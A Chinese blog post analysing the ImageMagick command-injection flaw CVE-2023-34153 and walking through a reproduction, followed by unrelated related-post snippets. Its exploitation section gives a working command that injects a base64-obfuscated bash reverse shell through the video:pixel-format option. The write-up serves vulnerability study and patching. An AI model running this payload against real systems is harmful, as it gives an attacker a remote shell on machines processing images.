ImageMagick 命令注入漏洞 (CVE-2023-34153)

最新推荐文章于 2024-07-23 09:21:34 发布
最新推荐文章于 2024-07-23 09:21:34 发布
阅读量281 收藏 8
点赞数 5
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuwenshequ/article/details/140601528
版权
前言

本文来源无问社区,更多实战内容,渗透思路尽在无问社区icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/12152.html

ImageMagick 是一个免费的创建、编辑、合成图片的软件。目前在 Github 上有 9.4k 的 star,有许多产品实际上都是使用 ImageMagick 作为底层能力的。

近期 ImageMagick 爆出在 7.1.0-1 及之前版本中存在命令注入漏洞。

Shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding

根据漏洞描述可知,该漏洞通过 VIDEO 编码 / 解码中的 video:vsync 或 video:pixel-format 选项注入命令。

影响版本:ImageMagick<=7.1.0-1

CVE-2023-34153

根据提交的 commit 进行分析

https://github.com/ImageMagick/ImageMagick/commit/cc4638de0c98701b04478a7ecd828caaeb0b58bd

在 ImageMagick/coders/video.c 的 ReadVIDEOImage 函数中,通过 GetImageOption 获取用户传入选项的值,ConcatenateMagickString 函数拼接字符串

图片

可以看到 ImageMagick 支持用户自定义选项 video:vsync 和 video:pixel-format,并将它们的值拼接后直接传入 ExternalDelegateCommand 函数

在该函数中会将传入的 command 经过扫描 &;<>| 非法字符的处理后,通过 system 函数实现命令执行

利用

处理普通的 gif 和 mov 文件的同时,在 video:pixel-format 选项中注入 shell 命令

wget https://github.com/ImageMagick/ImageMagick/releases/download/7.1.0-1/ImageMagick-a5513da-gcc-x86_64.AppImage
wget https://gitee.com/y1wan_1/test/raw/master/test.gif -O test.gif
wget https://gitee.com/y1wan_1/test/raw/master/test.mov -O test.mov
./ImageMagick-a5513da-gcc-x86_64.AppImage convert -define video:pixel-format='rgba"echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODg4OSAwPiYxIg==|base64 -d|bash"' test.gif test.mov

反弹 shell 如下

图片

注意:仅供学习参考,严禁用于非法目的!

无问社区
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ImageMagick-7.1.1-21-Q16-x86-dll.exe
11-02
这个特定的版本是"ImageMagick-7.1.1-21-Q16-x86-dll.exe",它针对的是Windows 32位系统,并且支持16位每像素组件的动态处理。 1. **ImageMagick**: ImageMagick是一款跨平台的命令行工具,也可以通过API集成到其他...
ImageMagick 7.0.7 Q16 (64-bit) Setup.zip
03-10
ImageMagick是一款强大的开源跨平台图像处理工具,广泛应用于各种操作系统,包括Windows、Linux和macOS等。这个压缩包“ImageMagick 7.0.7 Q16 (64-bit) Setup.zip”包含了适用于64位系统的ImageMagick 7.0.7版本的...
漏洞复现】ImageMagick命令注入漏洞(CVE-2016–3714/15/16/17/18)
m0_52923241的博客
04-03 1244
ImageMagic是一款图片处理工具,当传入一个恶意图片时,就有可能存在命令注入漏洞ImageMagick默认支持一种图片格式mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。影响ImageMagick 6.9.3-9以前的所有版本。
Imagemagick 命令注入漏洞 (CVE-2016–3714)
zzzzz1284的博客
01-16 122
CVE-2016–3714
ImageMagick命令注入漏洞(CVE-2016–3714)
HEAVEN569的博客
06-28 1144
震惊!!看图片也能中招!
ImageMagick
蓝天白云
07-11 9627
1、官网 http://www.imagemagick.org/script/index.php 列子:http://www.imagemagick.org/Usage/thumbnails/#rounded%5Fborder  示例很好:http://www.imagemagick.org/Usage/crop/     2、图片裁剪 原文:http://www.netingcn.
ImageMagick 命令执行漏洞
kuiguowei的博客
01-16 2745
docker Docker是由一家叫做Dotcloud的公司出品。 Docker是一个由GO语言写的程序运行的容器; 目前云服务的基石是操作系统级别的隔离,在同一台物理服务器上虚拟出多个主机。Docker则实现了一种应用程序级别的隔离; 它改变我们基本的开发、操作单元,由直接操作虚拟主机(VM),转换到操作程序运行的“容器”上来。 它也是一个开源的应用容器引擎,让开发者可以打包他们的应用以及
深入浅析ImageMagick命令执行漏洞
09-21
例如,如果攻击者构造的URL包含特定字符,如`"|"`、`"`、`&`,它们可以被用于插入额外的系统命令,导致命令注入。 例如,攻击者可能会构造这样一个URL:`https://test.com"|ls -al`,当ImageMagick尝试处理这个URL...
ImageMagick-7.1.0-23-Q16-HDRI-x64-dll
02-10
ImageMagick-7.1.0-23-Q16-HDRI-x64-dll
ImageMagick-6.7.5-0-Q16-windows.zip
09-28
在解压提供的"ImageMagick-6.7.5-0"文件后,用户将获得ImageMagick的可执行文件和必要的库文件,这些文件通常位于一个名为"bin"的子目录中。这些工具可以直接通过命令行运行,也可以集成到其他程序或脚本中,实现...
ImageMagick命令注入漏洞(CVE-2016–3714)复现笔记
u011975363的专栏
06-18 2244
学习资料 https://www.cnblogs.com/bmjoker/p/9898590.html https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html 漏洞原理 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 国外的安全人员为此新建了一个网站:
php imagemagick 漏洞,ImageMagick popen_utf8命令注入 漏洞报告
weixin_28956753的博客
03-10 141
Author: niubl(知道创宇404安全实验室)Date: 2016-05-07一、漏洞概要i. 漏洞描述ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。我发现当用户传入一个包含|竖线的文件名的时候,就有可能触发命令注入漏洞。ii. 漏洞影响测试:ImageMagick-7.0.1-2.tar.bz2iii...
“微软蓝屏”事件暴露了网络安全哪些问题?
weixin_62595121的博客
07-22 1719
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。中国国际问题研究院助理研究员 谢卉:私营部门在技术发展和创新上处于前沿,拥有很大的主导权,但是他们现在和公共利益的联系也越来越紧密,因此要加强对私营部门的监管,让他们投资建设更为可靠的网络基础设施,减少由单点故障带来的风险。报道称,英国多家药店的支付功能也一度出现问题。
网络安全等级保护制度1.0与2.0的演进与变革
gmqqcsdn的博客
07-23 545
等保1.0是我国在网络安全领域迈出的重要一步,它于2008年正式发布。该版本的等保制度以《信息安全技术 信息系统安全等级保护基本要求》为核心标准,主要聚焦于信息系统的物理安全网络安全、主机安全、应用安全和数据安全等方面的基础防护。等保1.0的实施对于提高我国信息系统的安全防护水平起到了积极的推动作用,但随着网络环境的快速变化和新型威胁的不断出现,等保1.0的局限性也逐渐显现。
Web安全:未验证的重定向和转发.
网络安全领域___专研者.
07-19 767
未验证的重定向和转发漏洞是一种常见的Web安全漏洞,它允许攻击者将用户重定向到一个恶意的URL,而不是预期的安全URL。这种漏洞通常发生在应用程序处理重定向和转发请求时,未能对目标URL进行适当的验证和过滤。
“微软蓝屏”事件暴露了的网络安全问题
最新发布
七夜的博客
07-23 521
软件更新过程中可能遇到的风险多种多样,但通过实施全面的测试流程、严格的质量控制措施和有效的风险管理策略,可以大大降低这些风险。测试团队应密切关注新增或修改的功能部分,确保这些改动不会破坏原有功能;同时,加强与其他团队的沟通和协作,共同确保软件更新的安全性和稳定性。
CVE-2016-8707
09-03
CVE-2016-8707是一种安全漏洞,具体详情需要通过查看相关链接来获取更多信息。此链接提供了下载ImageMagick软件的rpm文件和安装的命令。安装过程中需要先安装ImageMagick-libs-7.0.10-29.x86_64.rpm,然后再安装ImageMagick-7.0.10-29.x86_64.rpm。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [升级ImageMagick到最新版本,修复 ImageMagick拒绝服务漏洞(CVE-2017-1000476)和ImageMagick远程...2016-8707)](https://blog.csdn.net/qq_42120178/article/details/108621697)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值